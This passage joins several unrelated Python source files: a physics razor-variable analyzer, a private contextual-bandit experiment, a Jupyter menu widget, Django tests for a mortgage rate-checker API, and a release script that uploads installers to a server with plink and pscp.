ROOT.TLorentzVector( pseudoJet1px, pseudoJet1py, pseudoJet1pz, pseudoJet1energy) event.pseudoJet2_had = ROOT.TLorentzVector( pseudoJet2px, pseudoJet2py, pseudoJet2pz, pseudoJet2energy) else: event.pseudoJet2_had = ROOT.TLorentzVector( pseudoJet1px, pseudoJet1py, pseudoJet1pz, pseudoJet1energy) event.pseudoJet1_had = ROOT.TLorentzVector( pseudoJet2px, pseudoJet2py, pseudoJet2pz, pseudoJet2energy) event.mr_had = self.computeMR(event.pseudoJet1_had, event.pseudoJet2_had) event.mtr_had = self.computeMTR(event.pseudoJet1_had, event.pseudoJet2_had, metp4) event.r_had = self.computeR(event.pseudoJet1_had, event.pseudoJet2_had, metp4) #### do same things for GEN if self.cfg_comp.isMC: (genmet, genmetphi) = event.met.genMET().pt(), event.met.genMET().phi() genmetp4 = ROOT.TLorentzVector() genmetp4.SetPtEtaPhiM(genmet,0,genmetphi,0) allGenJets = [ x for x in self.handles['genJets'].product() ] objects40jc_Gen = [ j for j in allGenJets if j.pt() > 40 and abs(j.eta())<2.5 ] if len(objects40jc_Gen)>=2: pxvec = ROOT.std.vector(float)() pyvec = ROOT.std.vector(float)() pzvec = ROOT.std.vector(float)() Evec = ROOT.std.vector(float)() grouping = ROOT.std.vector(int)() for jet in objects40jc_Gen: pxvec.push_back(jet.px()) pyvec.push_back(jet.py()) pzvec.push_back(jet.pz()) Evec.push_back(jet.energy()) megajet = Megajet(pxvec, pyvec, pzvec, Evec, 1) pseudoJet1px = megajet.getAxis1()[0] * megajet.getAxis1()[3] pseudoJet1py = megajet.getAxis1()[1] * megajet.getAxis1()[3] pseudoJet1pz = megajet.getAxis1()[2] * megajet.getAxis1()[3] pseudoJet1energy = megajet.getAxis1()[4] pseudoJet2px = megajet.getAxis2()[0] * megajet.getAxis2()[3] pseudoJet2py = megajet.getAxis2()[1] * megajet.getAxis2()[3] pseudoJet2pz = megajet.getAxis2()[2] * megajet.getAxis2()[3] pseudoJet2energy = megajet.getAxis2()[4] pseudoJet1pt2 = pseudoJet1px*pseudoJet1px + pseudoJet1py*pseudoJet1py pseudoJet2pt2 = pseudoJet2px*pseudoJet2px + pseudoJet2py*pseudoJet2py if pseudoJet1pt2 >= pseudoJet2pt2: pseudoJet1_gen = ROOT.TLorentzVector( pseudoJet1px, pseudoJet1py, pseudoJet1pz, pseudoJet1energy) pseudoJet2_gen = ROOT.TLorentzVector( pseudoJet2px, pseudoJet2py, pseudoJet2pz, pseudoJet2energy) else: pseudoJet2_gen = ROOT.TLorentzVector( pseudoJet1px, pseudoJet1py, pseudoJet1pz, pseudoJet1energy) pseudoJet1_gen = ROOT.TLorentzVector( pseudoJet2px, pseudoJet2py, pseudoJet2pz, pseudoJet2energy) event.mr_gen = self.computeMR(pseudoJet1_gen, pseudoJet2_gen) event.mtr_gen = self.computeMTR(pseudoJet1_gen, pseudoJet2_gen, genmetp4) event.r_gen = self.computeR(pseudoJet1_gen, pseudoJet2_gen, genmetp4) else: event.mr_gen = -999 event.mtr_gen = -999 event.r_gen = -999 ## ===> full RAZOR (jets + leptons) objects10lc = [ l for l in event.selectedLeptons if l.pt() > 10 and abs(l.eta())<2.5 ] if hasattr(event, 'selectedIsoCleanTrack'): objects10lc = [ l for l in event.selectedLeptons if l.pt() > 10 and abs(l.eta())<2.5 ] + [ t for t in event.selectedIsoCleanTrack ] objects40j10lc = objects40jc + objects10lc objects40j10lc.sort(key = lambda obj : obj.pt(), reverse = True) if len(objects40j10lc)>=2: pxvec = ROOT.std.vector(float)() pyvec = ROOT.std.vector(float)() pzvec = ROOT.std.vector(float)() Evec = ROOT.std.vector(float)() grouping = ROOT.std.vector(int)() for obj in objects40j10lc: pxvec.push_back(obj.px()) pyvec.push_back(obj.py()) pzvec.push_back(obj.pz()) Evec.push_back(obj.energy()) #for obj in objects_fullmt2: # print "pt: ", obj.pt(), ", eta: ", obj.eta(), ", phi: ", obj.phi(), ", mass: ", obj.mass() #### get megajets (association method: default 1 = minimum sum of the invariant masses of the two megajets) megajet = Megajet(pxvec, pyvec, pzvec, Evec, 1) pseudoJet1px = megajet.getAxis1()[0] * megajet.getAxis1()[3] pseudoJet1py = megajet.getAxis1()[1] * megajet.getAxis1()[3] pseudoJet1pz = megajet.getAxis1()[2] * megajet.getAxis1()[3] pseudoJet1energy = megajet.getAxis1()[4] pseudoJet2px = megajet.getAxis2()[0] * megajet.getAxis2()[3] pseudoJet2py = megajet.getAxis2()[1] * megajet.getAxis2()[3] pseudoJet2pz = megajet.getAxis2()[2] * megajet.getAxis2()[3] pseudoJet2energy = megajet.getAxis2()[4] pseudoJet1pt2 = pseudoJet1px*pseudoJet1px + pseudoJet1py*pseudoJet1py pseudoJet2pt2 = pseudoJet2px*pseudoJet2px + pseudoJet2py*pseudoJet2py if pseudoJet1pt2 >= pseudoJet2pt2: event.pseudoJet1 = ROOT.TLorentzVector( pseudoJet1px, pseudoJet1py, pseudoJet1pz, pseudoJet1energy) event.pseudoJet2 = ROOT.TLorentzVector( pseudoJet2px, pseudoJet2py, pseudoJet2pz, pseudoJet2energy) else: event.pseudoJet2 = ROOT.TLorentzVector( pseudoJet1px, pseudoJet1py, pseudoJet1pz, pseudoJet1energy) event.pseudoJet1 = ROOT.TLorentzVector( pseudoJet2px, pseudoJet2py, pseudoJet2pz, pseudoJet2energy) ### event.mr = self.computeMR(event.pseudoJet1, event.pseudoJet2) event.mtr = self.computeMTR(event.pseudoJet1, event.pseudoJet2, metp4) event.r = self.computeR(event.pseudoJet1, event.pseudoJet2, metp4) #### do the razor with one or two b jets (medium CSV) if len(event.bjetsMedium)>=2: bJet1 = ROOT.TLorentzVector(event.bjetsMedium[0].px(), event.bjetsMedium[0].py(), event.bjetsMedium[0].pz(), event.bjetsMedium[0].energy()) bJet2 = ROOT.TLorentzVector(event.bjetsMedium[1].px(), event.bjetsMedium[1].py(), event.bjetsMedium[1].pz(), event.bjetsMedium[1].energy()) event.mr_bb = self.computeMR(bJet1, bJet2) event.mtr_bb = self.computeMTR(bJet1, bJet2, metp4) event.r_bb = self.computeR(bJet1, bJet2, metp4) # print 'MR(2b)',event.mr_bb if len(event.bjetsMedium)==1: objects40jcCSV = [ j for j in event.cleanJets if j.pt() > 40 and abs(j.eta())<2.5 and j.p4()!=event.bjetsMedium[0].p4() ] objects40jcCSV.sort(key = lambda l : l.btag('combinedInclusiveSecondaryVertexV2BJetTags'), reverse = True) if len(objects40jcCSV)>0: bJet1 = ROOT.TLorentzVector(event.bjetsMedium[0].px(), event.bjetsMedium[0].py(), event.bjetsMedium[0].pz(), event.bjetsMedium[0].energy()) bJet2 = ROOT.TLorentzVector(objects40jcCSV[0].px(), objects40jcCSV[0].py(), objects40jcCSV[0].pz(), objects40jcCSV[0].energy()) event.mr_bb = self.computeMR(bJet1, bJet2) event.mtr_bb = self.computeMTR(bJet1, bJet2, metp4) event.r_bb = self.computeR(bJet1, bJet2, metp4) ## print 'MRbb(1b)',event.mr_bb ## ===> leptonic MR if not self.cfg_ana.doOnlyDefault: if len(event.selectedLeptons)>=2: lep1 = ROOT.TLorentzVector(event.selectedLeptons[0].px(), event.selectedLeptons[0].py(), event.selectedLeptons[0].pz(), event.selectedLeptons[0].energy()) lep2 = ROOT.TLorentzVector(event.selectedLeptons[1].px(), event.selectedLeptons[1].py(), event.selectedLeptons[1].pz(), event.selectedLeptons[1].energy()) event.mr_lept = self.computeMR(lep1, lep2) event.mtr_lept = self.computeMTR(lep1, lep2, metp4) event.r_lept = self.computeR(lep1, lep2, metp4) ### def process(self, event): self.readCollections( event.input ) event.mr_gen=-999 event.mtr_gen=-999 event.r_gen=-999 event.mr_bb=-999 event.mtr_bb=-999 event.r_bb=-999 event.mr_lept=-999 event.mtr_lept=-999 event.r_lept=-999 event.mr_had=-999 event.mtr_had=-999 event.r_had=-999 event.mr=-999 event.mtr=-999 event.r=-999 event.pseudoJet1 = ROOT.TLorentzVector( 0, 0, 0, 0 ) event.pseudoJet2 = ROOT.TLorentzVector( 0, 0, 0, 0 ) ### self.makeRAZOR(event) # print 'variables computed: MR=',event.mr_had,'R=',event.r,'MTR=',event.mtr # print 'pseudoJet1 px=',event.pseudoJet1.px(),' py=',event.pseudoJet1.py(),' pz=',event.pseudoJet1.pz() # print 'pseudoJet2 px=',event.pseudoJet2.px(),' py=',event.pseudoJet2.py(),' pz=',event.pseudoJet2.pz() return True
438769
from .resnet import ResidualNet, ConvResidualNet from .unet import UNet from .attention import ConvAttentionNet from .mlp import MLP from .conv import SylvesterFlowConvEncoderNet, SylvesterFlowConvDecoderNet,infoGAN_decoder, infoGAN_encoder, ConvEncoder, simple_decoder, ConvDecoder, Conv2dSameSize, ModifiedConvEncoder
438786
import os import sys import glob import tqdm import warnings import argparse import copy import numpy as np import pandas as pd from itertools import product from functools import partial from math import sqrt, exp, pi, gamma, log from multiprocessing import Pool, cpu_count pdir = os.path.abspath(os.path.dirname(os.path.dirname(__file__))) sys.path.append(pdir) from plotters import plotters from utils import wrap_params, settings_dict def run(random_seed, prefix, epsilon, n_action, time_horizon, dimension = 20, echo_freq = 100 ): np.random.seed(random_seed) T = time_horizon k = n_action d = dimension s = int(d/k) v = 1 echo_freq = echo_freq delta = 0.1 alpha = 0.1 sigma = 6*sqrt(2*log(2.5/delta))/epsilon warm_up = int(3e3) I = np.eye(d) B = (exp(epsilon) + 1)/(exp(epsilon) - 1) * sqrt(pi) / 2 * d * gamma((d - 1)/2 + 1)/ gamma(d/2 + 1) threshold = exp(epsilon)/(exp(epsilon)+1) zeta = d*k/(sqrt(T)*1000) OLS_Vs = [np.zeros((d,d)) for _ in range(k)] OLS_Rs = [np.zeros((d,1)) for _ in range(k)] SGD_Vs = [np.zeros((d,d)) for _ in range(k)] SGD_Rs = [np.zeros((d,1)) for _ in range(k)] UCB_I = np.eye(d*k) UCB_Vs = np.zeros((d*k, d*k)) UCB_Rs = np.zeros((d*k, 1)) GLOC_I = np.eye(d*k) GLOC_Vs = np.zeros((d*k, d*k)) GLOC_Rs = np.zeros((d*k, 1)) def perturb(X, Y): noise_covariance = np.random.normal(0, sigma, size=X.shape) for i in range(len(noise_covariance)): for j in range(i): noise_covariance[i][j] = noise_covariance[j][i] noise_reward = np.random.normal(0, sigma, size=Y.shape) return noise_covariance, noise_reward def privacy_process(X, Y): noise_covariance, noise_reward = perturb(X, Y) noised_package = dict() X = X + noise_covariance Y = Y + noise_reward return X, Y # estimator init_theta = np.random.normal(0, 1, (d)) init_theta /= sqrt(init_theta.T.dot(init_theta)) init_theta = np.tile(init_theta, (d,k)) theta_sgd = copy.deepcopy(init_theta) theta_ols = copy.deepcopy(init_theta) theta_ucb = np.random.normal(0, 1, (d*k, 1)) theta_ucb /= sqrt(theta_ucb.T.dot(theta_ucb)) theta_gloc = copy.deepcopy(theta_ucb) theta_gloc_h = copy.deepcopy(theta_ucb) # theta setting # theta = np.zeros((d, k)) # for i in range(k): # theta[i*s:(i+1)*s, i] = 1 # theta[:, i] = np.random.normal(0, sqrt(v)/3, (d)) # theta[:, i] /= sqrt(theta[:, i].T.dot(theta[:, i])) # theta setting 2 theta = np.random.normal(0, 1, (d, k)) for i in range(k): theta[:, i] /= sqrt(theta[:, i].T.dot(theta[:, i])) context = np.random.normal(0, 1, (d, 1)) # context /= sqrt(context.T.dot(context)) # iterator = tqdm.tqdm(range(T+1)) iterator = range(T+1) times = list() est_errors_sgd = list() est_errors_ucb = list() est_errors_ols = list() est_errors_gloc = list() pseudo_regrets_sgd = list() pseudo_regrets_ucb = list() pseudo_regrets_ols = list() pseudo_regrets_gloc = list() pseudo_cum_regrets_sgd = list() pseudo_cum_regrets_ucb = list() pseudo_cum_regrets_ols = list() pseudo_cum_regrets_gloc = list() for t in iterator: record = dict() # For MAB contextual decision select_index_sgd = np.argmax([theta_sgd[:, i].T.dot(context) for i in range(k)]) select_index_ols = np.argmax([theta_ols[:, i].T.dot(context) for i in range(k)]) if t<warm_up: select_index_sgd = t%k select_index_ols = t%k # For linear contextual decision upsilon_t1 = sigma*sqrt(t)*(4*sqrt(d) + 2*log(2*T/alpha)) # t-1 upsilon_t = sigma*sqrt(t+1)*(4*sqrt(d) + 2*log(2*T/alpha)) # t-1 c_t1 = 2*upsilon_t1 c_t = 2*upsilon_t beta = 2*sigma*sqrt(d*log(T)) + (sqrt(3*upsilon_t) + sigma*sqrt(d*(t+1)/upsilon_t))*d*log(T) linear_contexts = np.zeros((d*k, k)) # ucb for i in range(k): linear_contexts[i*d:(i+1)*d, i] = context.ravel() try: temp_matrix = np.linalg.inv(UCB_Vs + c_t1 * UCB_I) except: temp_matrix = np.identity(d*k) action_values = [] for i in range(linear_contexts.shape[1]): x = linear_contexts[:,i] UCB_value = theta_ucb.T.dot(x)[0]+beta*sqrt(x.T.dot(temp_matrix).dot(x)) action_values.append(UCB_value) select_index_ucb = np.argmax(action_values) # gloc try: temp_matrix = np.linalg.inv(GLOC_Vs + c_t1 * GLOC_I) # V_{t-1}, c_{t-1} except: temp_matrix = np.identity(d*k) action_values = [] for i in range(linear_contexts.shape[1]): x = linear_contexts[:,i] GLOC_value = theta_gloc.T.dot(x)[0]+beta*sqrt(x.T.dot(temp_matrix).dot(x)) action_values.append(GLOC_value) select_index_gloc = np.argmax(action_values) # return regret for sgd expected_reward_sgd = context.T.dot(theta[:, select_index_sgd]) noise = np.random.normal(0, 0.05, size=(1,1)) reward_sgd = expected_reward_sgd + noise optimal_value = np.max([context.T.dot(theta[:, i]) for i in range(k)]) pseudo_regret_sgd = optimal_value - expected_reward_sgd # return regret for ols expected_reward_ols = context.T.dot(theta[:, select_index_ols]) noise = np.random.normal(0, 0.05, size=(1,1)) reward_ols = expected_reward_ols + noise # optimal_value = np.max([context.T.dot(theta[:, i]) for i in range(k)]) pseudo_regret_ols = optimal_value - expected_reward_ols # return regret for UCB expected_reward_ucb = context.T.dot(theta[:, select_index_ucb]) noise = np.random.normal(0, 0.05, size=(1,1)) reward_ucb = expected_reward_ucb + noise # optimal_value = np.max([context.T.dot(theta[:, i]) for i in range(k)]) pseudo_regret_ucb = optimal_value - expected_reward_ucb # return regret for GLOC expected_reward_gloc = context.T.dot(theta[:, select_index_gloc]) noise = np.random.normal(0, 0.05, size=(1,1)) reward_gloc = expected_reward_gloc + noise # optimal_value = np.max([context.T.dot(theta[:, i]) for i in range(k)]) pseudo_regret_gloc = optimal_value - expected_reward_gloc # SGD update if t<warm_up: SGD_Xs = [np.zeros((d,d)) for _ in range(k)] SGD_Xs[select_index_sgd] = context.dot(context.T) SGD_Ys = [np.zeros((d,1)) for _ in range(k)] SGD_Ys[select_index_sgd] = reward_sgd*context i = select_index_sgd SGD_Xs[i], SGD_Ys[i] = privacy_process(SGD_Xs[i], SGD_Ys[i]) SGD_Vs[i] += SGD_Xs[i] SGD_Rs[i] += SGD_Ys[i] theta_sgd[:, i] = np.linalg.inv(SGD_Vs[i] + c_t * I).dot(SGD_Rs[i]).ravel() else: gradients = np.zeros((d*k)) gradients[(select_index_sgd*d): ((select_index_sgd+1)*d)] = ((context.T.dot(theta_sgd[:, select_index_sgd]) - reward_sgd)*context).ravel() x = gradients if (x.T.dot(x)>0): x = x/sqrt(x.T.dot(x)) if np.random.uniform()> (1/2+sqrt(x.T.dot(x))/(2)) else -x/sqrt(x.T.dot(x)) else: raise Exception("Sorry, x is a zero vector") prob = np.random.uniform() while True: z = np.random.normal(0, 1, (d*k, 1)) z = z/sqrt(z.T.dot(z))*B if (((prob>threshold) and (z.T.dot(x)>0)) or ((prob<=threshold) and (z.T.dot(x)<=0))): break eta = sqrt(k)*d/(200*(t+1)) for i in range(k): theta_sgd[:, i] = theta_sgd[:, i] - eta*(z[(i*d): ((i+1)*d)].ravel() + 0.00*theta_sgd[:, i]) # OLS update OLS_Xs = [np.zeros((d,d)) for _ in range(k)] OLS_Xs[select_index_ols] = context.dot(context.T) OLS_Ys = [np.zeros((d,1)) for _ in range(k)] OLS_Ys[select_index_ols] = reward_ols*context if t<warm_up: i = select_index_ols OLS_Xs[i], OLS_Ys[i] = privacy_process(OLS_Xs[i], OLS_Ys[i]) OLS_Vs[i] += OLS_Xs[i] OLS_Rs[i] += OLS_Ys[i] theta_ols[:, i] = np.linalg.inv(OLS_Vs[i] + c_t * I).dot(OLS_Rs[i]).ravel() else: for i in range(k): OLS_Xs[i], OLS_Ys[i] = privacy_process(OLS_Xs[i], OLS_Ys[i]) OLS_Vs[i] += OLS_Xs[i] OLS_Rs[i] += OLS_Ys[i] theta_ols[:, i] = np.linalg.inv(OLS_Vs[i] + c_t * I).dot(OLS_Rs[i]).ravel() # UCB Update X, Y = privacy_process(linear_contexts[:, select_index_ucb].reshape((-1, 1)).dot(linear_contexts[:, select_index_ucb].reshape((-1, 1)).T),\ reward_ucb*linear_contexts[:, select_index_ucb].reshape((-1, 1))) UCB_Vs += X UCB_Rs += Y theta_ucb = np.linalg.inv(UCB_Vs + c_t * UCB_I).dot(UCB_Rs) # GLOC Update linear_context = linear_contexts[:, [select_index_gloc]] X, Y = privacy_process(linear_context.T.dot(linear_context),\ linear_context.T.dot(theta_gloc_h)*linear_contexts[:, [select_index_gloc]]) GLOC_Vs += X GLOC_Rs += Y theta_gloc = np.linalg.inv(GLOC_Vs + c_t * GLOC_I).dot(GLOC_Rs) nabla_h = (theta_gloc_h.T.dot(linear_context) - reward_gloc)*linear_context nabla_h += np.random.normal(0, 2*sigma, size=nabla_h.shape) theta_gloc_h -= zeta*nabla_h # Update next contex context = np.random.normal(0, 1, (d, 1)) # Records pseudo_regrets_sgd.append(pseudo_regret_sgd[0]) pseudo_regrets_ols.append(pseudo_regret_ols[0]) pseudo_regrets_ucb.append(pseudo_regret_ucb[0]) pseudo_regrets_gloc.append(pseudo_regret_gloc[0]) if (t%echo_freq==0): times.append(t) est_errors_sgd.append(sum([np.linalg.norm(theta_sgd[:, [i]] - theta[:, [i]]) for i in range(k)])) est_errors_ols.append(sum([np.linalg.norm(theta_ols[:, [i]] - theta[:, [i]]) for i in range(k)])) est_errors_ucb.append(sum([np.linalg.norm(theta_ucb[i*d:(i+1)*d, :] - theta[:, [i]]) for i in range(k)])) est_errors_gloc.append(sum([np.linalg.norm(theta_gloc[i*d:(i+1)*d, :] - theta[:, [i]]) for i in range(k)])) pseudo_cum_regrets_sgd.append(np.sum(pseudo_regrets_sgd)) pseudo_cum_regrets_ols.append(np.sum(pseudo_regrets_ols)) pseudo_cum_regrets_ucb.append(np.sum(pseudo_regrets_ucb)) pseudo_cum_regrets_gloc.append(np.sum(pseudo_regrets_gloc)) df = pd.DataFrame({'time':times, 'sgdest': est_errors_sgd, 'ucbest': est_errors_ucb, 'glocest': est_errors_gloc, \ 'olsest': est_errors_ols, 'sgdr': pseudo_cum_regrets_sgd, 'ucbr': pseudo_cum_regrets_ucb, \ 'olsr': pseudo_cum_regrets_ols, 'glocr': pseudo_cum_regrets_gloc}) df.to_csv(prefix + 'multi_param_nowarmup' + '|'+ 'eps=' + str(epsilon) + '|'+ 'n_action=' + str(k) + '|' + 'random_seed=' + str(random_seed) + '|.csv') return None if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('--time_horizon', type = int, default = int(1e6), help='total time horizon to run') parser.add_argument('--n_random_seeds', type = int, default = 3, help='total amount of random seeds') parser.add_argument('--n_actions', type = int, default = 5, help='number of action') parser.add_argument('--dimension', type = int, default = 20, help='dimension of context') parser.add_argument('--eps', type = float, nargs = '+', default=[1], help='privacy epsilon') parser.add_argument('--echo_freq', type = int, default=100, help='echo frequency') parser.add_argument('--dest', type = str, default = '/results/multi-param-eps=0.5/', help='destination folders') args = parser.parse_args() prefix = [pdir + args.dest] random_seeds = list(range(args.n_random_seeds)) if not os.path.exists(prefix[0]): os.makedirs(prefix[0]) n_process = min(len(args.eps)*args.n_random_seeds, 3) print(f'using {n_process} processes') with Pool(processes = n_process) as pool: collection_source = pool.starmap(run, product(random_seeds, prefix, args.eps, [args.n_actions], [args.time_horizon], [args.dimension])) plotters.multiparam_exp_plot(prefix[0], 'Multiparam', 'r') plotters.multiparam_exp_plot(prefix[0], 'Multiparam', 'est')
438789
from ipywidgets import Box from hdijupyterutils.ipythondisplay import IpythonDisplay from hdijupyterutils.ipywidgetfactory import IpyWidgetFactory class AbstractMenuWidget(Box): def __init__(self, spark_controller, ipywidget_factory=None, ipython_display=None, nested_widget_mode=False, testing=False, **kwargs): kwargs['orientation'] = 'vertical' if not testing: super(AbstractMenuWidget, self).__init__((), **kwargs) self.spark_controller = spark_controller if ipywidget_factory is None: ipywidget_factory = IpyWidgetFactory() self.ipywidget_factory = ipywidget_factory if ipython_display is None: ipython_display = IpythonDisplay() self.ipython_display = ipython_display self.children = [] if not nested_widget_mode: self._repr_html_() def _repr_html_(self): for child in self.children: self.ipython_display.display(child) return "" def hide_all(self): for child in self.children: child.visible = False def run(self): raise NotImplementedError("Concrete menu widget must define run")
438815
import json from datetime import datetime, timedelta from django.test import override_settings from django.utils import timezone from model_mommy import mommy from rest_framework import status from rest_framework.test import APITestCase from ratechecker.models import Adjustment, Product, Rate, Region from ratechecker.views import set_lock_max_min try: from django.urls import reverse except ImportError: from django.core.urlresolvers import reverse class RateCheckerTestCase(APITestCase): def setUp(self): self.url = "/oah-api/rates/rate-checker" REGIONS = [[1, "DC"], [2, "VA"]] PRODUCTS = [ # plan_id, institution, loan_purpose, pmt_type, loan_type, loan_term, int_adj_term, _, io, _, _, _, _, _, _, # noqa # min_ltv, max_ltv, minfico, maxfico, min_loan_amt, max_loan_amt, single_family, condo, coop # noqa [ 11, "Institution 1", "PURCH", "FIXED", "CONF", 30, None, None, 0, None, None, None, None, None, None, 1, 95, 680, 700, 90000, 750000, 1, 0, 0, ], [ 22, "Institution 2", "PURCH", "FIXED", "CONF", 30, None, None, 0, None, None, None, None, None, None, 1, 87, 680, 740, 90000, 550000, 1, 0, 0, ], [ 33, "Institution 3", "PURCH", "ARM", "CONF", 15, 5, None, 0, None, None, None, None, None, None, 1, 95, 680, 740, 90000, 550000, 1, 0, 0, ], [ 44, "Institution 4", "PURCH", "FIXED", "CONF", 30, None, None, 0, None, None, None, None, None, None, 1, 87, 680, 740, 90000, 550000, 1, 0, 0, ], [ 55, "Institution 5", "PURCH", "ARM", "CONF", 30, 5, None, 0, None, None, None, None, None, None, 1, 87, 680, 740, 90000, 550000, 1, 0, 0, ], [ 66, "Institution 6", "PURCH", "FIXED", "CONF", 30, None, None, 0, None, None, None, None, None, None, 1, 87, 680, 740, 90000, 550000, 1, 0, 0, ], [ 77, "Institution 7", "PURCH", "FIXED", "FHA-HB", 15, None, None, 0, None, None, None, None, None, None, 1, 87, 680, 740, 90000, 550000, 1, 0, 0, ], [ 88, "Institution 8", "PURCH", "FIXED", "FHA", 30, None, None, 0, None, None, None, None, None, None, 1, 87, 680, 740, 90000, 550000, 1, 0, 0, ], ] RATES = [ # rate_id, product_id, region_id, lock, base_rate, total_points [111, 11, 1, 50, "3.150", "0.5"], [112, 11, 2, 60, "4.350", "-0.5"], [113, 11, 1, 60, "2.125", "0.125"], [221, 22, 1, 60, "3.555", "0.125"], [331, 33, 1, 60, "3.250", "0.125"], [332, 33, 2, 60, "4.650", "-0.5"], [441, 44, 1, 50, "3.125", "1.25"], [551, 55, 1, 50, "0.125", "0.125"], [661, 66, 1, 60, "3.705", "0.5"], [771, 77, 2, 60, "1.705", "0.25"], [772, 77, 2, 60, "2.705", "1.25"], [881, 88, 1, 60, "3.000", "0.5"], [882, 88, 1, 60, "2.005", "0.25"], [883, 88, 1, 60, "1.005", "-0.25"], ] ADJUSTMENTS = [ # rule_id, product_id, affect_rate_type, adj_value, min_loan_amt, # max_loan_amt, prop_type, minfico, maxfico, minltv, maxltv, state [ 1, 11, "P", "-0.35", 100000, 500000, "CONDO", 660, 780, 30, 95, "DC", ], [ 2, 11, "P", "0.25", 100000, 500000, "CONDO", 660, 780, 30, 95, "DC", ], [ 3, 11, "R", "0.15", 100000, 500000, "CONDO", 660, 780, 30, 95, "DC", ], [ 4, 22, "R", "0.25", 100000, 500000, "CONDO", 660, 780, 30, 95, "VA", ], [ 5, 22, "R", "0.15", 100000, 500000, "CONDO", 660, 780, 30, 95, "DC", ], [ 6, 33, "R", "0.25", 100000, 500000, "CONDO", 660, 780, 30, 95, "DC", ], [ 7, 77, "P", "0.125", 100000, 500000, "CONDO", 660, 780, 30, 95, "VA", ], ] NOW = timezone.now() for region in REGIONS: reg = Region( region_id=region[0], state_id=region[1], data_timestamp=NOW ) reg.save() for p in PRODUCTS: product = Product( plan_id=p[0], institution=p[1], loan_purpose=p[2], pmt_type=p[3], loan_type=p[4], loan_term=p[5], int_adj_term=p[6], adj_period=p[7], io=p[8], arm_index=p[9], int_adj_cap=p[10], annual_cap=p[11], loan_cap=p[12], arm_margin=p[13], ai_value=p[14], min_ltv=p[15], max_ltv=p[16], min_fico=p[17], max_fico=p[18], min_loan_amt=p[19], max_loan_amt=p[20], single_family=p[21], condo=p[22], coop=p[23], data_timestamp=NOW, ) product.save() for r in RATES: rate = Rate( rate_id=r[0], product_id=r[1], region_id=r[2], lock=r[3], base_rate=r[4], total_points=r[5], data_timestamp=NOW, ) rate.save() for a in ADJUSTMENTS: adjustment = Adjustment( rule_id=a[0], product_id=a[1], affect_rate_type=a[2], adj_value=a[3], min_loan_amt=a[4], max_loan_amt=a[5], prop_type=a[6], min_fico=a[7], max_fico=a[8], min_ltv=a[9], max_ltv=a[10], state=a[11], data_timestamp=NOW, ) adjustment.save() def test_set_lock_max_min(self): """Make sure max and min are set""" locks = { 60: {"lock": "60", "minval": 46}, 45: {"lock": "45", "minval": 31}, 30: {"lock": "30", "minval": 0}, } for key in locks.keys(): mock_data = set_lock_max_min(locks[key]) self.assertEqual(mock_data["max_lock"], key) self.assertEqual(mock_data["min_lock"], locks[key]["minval"]) def test_rate_checker__no_args(self): """... when no parameters provided""" response = self.client.get(self.url, {}) self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST) def test_rate_checker__valid(self): """... when valid parameters are provided""" params = { "state": "DC", "loan_purpose": "PURCH", "rate_structure": "FIXED", "loan_type": "CONF", "max_ltv": 50, "min_ltv": 50, "loan_term": 30, "loan_amount": 160000, "price": 320000, "maxfico": 700, "minfico": 700, "max_lock": 60, "min_lock": 45, "property_type": "CONDO", "arm_type": "5-1", "io": 0, } response = self.client.get(self.url, params) self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(len(response.data.get("data")), 2) self.assertEqual(response.data.get("data").get("2.275"), 1) self.assertEqual(response.data.get("data").get("3.705"), 2) # self.assertTrue(result) # self.assertEqual(len(result), 2) # self.assertEqual(len(result['data']), 2) # self.assertEqual(result['data']['2.275'], 1) # self.assertEqual(result['data']['3.705'], 2) # self.assertFalse(response_fixed.data.get('data') is None) # self.assertEqual(response_fixed.data.get('data').get('monthly'), 1.5) # self.assertTrue(response_fixed.data.get('data').get('upfront') is None) # noqa @override_settings(URLCONF="ratechecker.urls") class RateCheckerStatusTest(APITestCase): def get(self): return self.client.get( reverse("rate-checker-status"), headers={"Accepts": "application/json"}, ) def test_no_data_returns_200(self): response = self.get() self.assertEqual(response.status_code, 200) def test_no_data_returns_json(self): response = self.get() self.assertEqual(response["Content-type"], "application/json") def test_no_data_returns_none(self): response = self.get() self.assertEqual(json.loads(response.content), {"load": None}) def test_data_returns_200(self): mommy.make(Region) response = self.get() self.assertEqual(response.status_code, 200) def test_data_returns_json(self): mommy.make(Region) response = self.get() self.assertEqual(response["Content-type"], "application/json") def test_data_returns_timestamp(self): region = mommy.make(Region) response = self.get() ts = datetime.strptime( json.loads(response.content)["load"], "%Y-%m-%dT%H:%M:%S.%fZ" ) ts = timezone.make_aware(ts, timezone=timezone.utc) # These might not match exactly due to ISO8601 JSON formatting. self.assertTrue(abs(ts - region.data_timestamp) < timedelta(seconds=1)) def test_data_format_iso8601(self): timestamp = datetime(2017, 1, 2, 3, 4, 56, tzinfo=timezone.utc) mommy.make(Region, data_timestamp=timestamp) response = self.get() self.assertContains(response, "2017-01-02T03:04:56Z")
438827
import os, sys, stat import CalcDigest def fileSize( f ) : return os.stat(f)[stat.ST_SIZE] def execRemote( cmd ) : return os.popen( 'plink ks@172.16.17.32 %s' % cmd ).read() def main() : updateBuildNumber = int(file('CSpaceUpdate-BuildNumber.txt').read().strip()) updateFile = 'CSpaceUpdate%d.exe' % updateBuildNumber updateRequires = int(file('CSpaceUpdate-Requires.txt').read().strip()) updateSize = fileSize( updateFile ) setupBuildNumber = int(file('CSpaceSetup-BuildNumber.txt').read().strip()) setupFile = 'CSpaceSetup%d.exe' % setupBuildNumber setupRequires = 0 setupSize = fileSize( setupFile ) latest = file('LatestVersion.txt','w') print>>latest, '%s:%d:%d:%d' % (updateFile,updateSize,updateBuildNumber,updateRequires) print>>latest, '%s:%d:%d:%d' % (setupFile,setupSize,setupBuildNumber,setupRequires) latest.close() fileList = [updateFile,setupFile,'LatestVersion.txt'] fileList.extend( ['CalcDigest.py', 'UpdateLatest.py'] ) localDigests = CalcDigest.digestList( fileList ) remoteDigests = {} print 'Fetching server digest list...' data = execRemote( 'cd /var/www-cspace.in/setupfiles; python CalcDigest.py %s' % (' '.join(fileList)) ) for line in data.split('\n') : line = line.strip() if not line : continue fileName,digest = line.split() remoteDigests[fileName] = digest for (fileName,digest) in localDigests : rd = remoteDigests.get( fileName, None ) sendFile = False if rd is None : status = 'file not found on remote server' sendFile = True elif digest == rd : status = 'file same on remote server' else : status = 'file differs on remote server' sendFile = True print '%s: %s' % (fileName,status) if sendFile : remoteUpdated = True print 'uploading file: %s' % fileName os.system( 'pscp %s ks@172.16.17.32:/var/www-cspace.in/setupfiles/%s' % 